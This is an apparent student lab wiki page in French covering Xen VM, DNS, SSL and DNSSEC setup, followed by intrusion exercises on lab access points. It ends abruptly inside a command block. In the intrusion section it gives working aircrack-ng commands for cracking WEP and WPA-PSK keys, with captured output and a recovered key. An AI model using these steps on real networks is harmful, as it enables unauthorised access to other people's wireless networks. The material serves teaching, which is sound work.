[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=GreenArrow --ip=193.48.57.162 --netmask=255.255.255.240 --gateway=193.48.57.172&lt;br /&gt;
  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Modification du fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-home -v&lt;br /&gt;
lvcreate -L 10G -n /dev/virtual/ima5-GreenArrow-var -v&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/GreenArrow/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-home,xvdc,w',&lt;br /&gt;
                  'phy:/dev/virtual/ima5-GreenArrow-var,xvdb,w',&lt;br /&gt;
              ]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
xl create /etc/xen/GreenArrow.cfg&lt;br /&gt;
ssh username@weppes&lt;br /&gt;
ssh root@193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous modifions le fichier '''named.conf.local''' pour créer les zones nécessaires :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;jjlddelamuerto.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.57.48.193.in-addr.arpa&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les fichiers '''db.jjlddelamuerto.space''' et '''db.57.48.193.in-addr.arpa''' :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns.jjlddelamuerto.space. &lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns      IN      A       193.48.57.162&lt;br /&gt;
www     IN      A       193.48.57.162&lt;br /&gt;
@       IN      A       193.48.57.162&lt;br /&gt;
ns      IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
www     IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
@       IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                        2016113007      ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns.jjlddelamuerto.space.&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns2.gandi.net.&lt;br /&gt;
&lt;br /&gt;
162                             IN      PTR     jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite le fichier /etc/resolv.conf afin de passer par notre serveur :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
search jjlddelamuerto.space&lt;br /&gt;
nameserver 193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous vérifions notre configuration :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# host www.jjlddelamuerto.space&lt;br /&gt;
www.jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
www.jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/bind# host -tany jjlddelamuerto.space&lt;br /&gt;
jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
jjlddelamuerto.space has SOA record ns.jjlddelamuerto.space. root.jjlddelamuerto.space. 2016113007 604800 86400 2419200 604800&lt;br /&gt;
jjlddelamuerto.space name server ns6.gandi.net.&lt;br /&gt;
jjlddelamuerto.space name server ns.jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
Premièrement, sur Gandi nous lançons l'étape d'achat d'un certificat SSL.&lt;br /&gt;
Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout GreenArrow.key -out GreenArrow.csr&lt;br /&gt;
Generating a 2048 bit RSA private key&lt;br /&gt;
&lt;br /&gt;
If you enter '.', the field will be left blank.&lt;br /&gt;
-----&lt;br /&gt;
Country Name (2 letter code) [AU]:FR&lt;br /&gt;
State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:jjlddelamuerto.space&lt;br /&gt;
Email Address []:&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# ls&lt;br /&gt;
GreenArrow.csr	GreenArrow.key&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available/clef# cat GreenArrow.csr&lt;br /&gt;
&lt;br /&gt;
-----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
-----END CERTIFICATE REQUEST-----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous continuons donc la procédure pour obtenir le certificat, et attendons donc sa mise en place.&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# apt-get install postfix mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# cp certificat.crt /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
root@GreenArrow:/etc/bind# cp serveur.key /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
root@GreenArrow:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
root@GreenArrow:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-jjlddelamuerto.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2/sites-available# cat 000-jjlddelamuerto.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.jjlddelamuerto.space&lt;br /&gt;
         ServerAlias jjlddelamuerto.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
   &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/jjlddelamuerto.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/jjlddelamuerto.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/apache2# cat ports.conf &lt;br /&gt;
Listen 80&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
	Listen 443&lt;br /&gt;
&amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 stop&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 start&lt;br /&gt;
root@GreenArrow:/etc/apache2# service apache2 reload&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre  site [https://jjlddelamuerto.space] est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE jjlddelamuerto.space&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE jjlddelamuerto.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# ls&lt;br /&gt;
dsset-jjlddelamuerto.space.	  jjlddelamuerto.space-zsk.key&lt;br /&gt;
jjlddelamuerto.space-ksk.key	  jjlddelamuerto.space-zsk.private&lt;br /&gt;
jjlddelamuerto.space-ksk.private&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ensuite nous signons les zones:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# dnssec-signzone -o jjlddelamuerto.space -k jjlddelamuerto.space-ksk &lt;br /&gt;
../db.jjlddelamuerto.space jjlddelamuerto.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.jjlddelamuerto.space.signed&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:jjlddnssec.png]]&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
Nous refaisons les mêmes actions que pour le crackage de clef WEP.&lt;br /&gt;
Cette fois nous essayons de cracker la clef WPA sur cracotte03.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wpa wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 13 -w crackWPA wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng -w dico.txt crackWPA-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous avons lancé ceci sur le eeePC qui a une vitesse de traitement 5 fois inférieure à celle d'une zabeth environ (environ 5h de traitement). Puis nous obtenons le résultat suivant:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
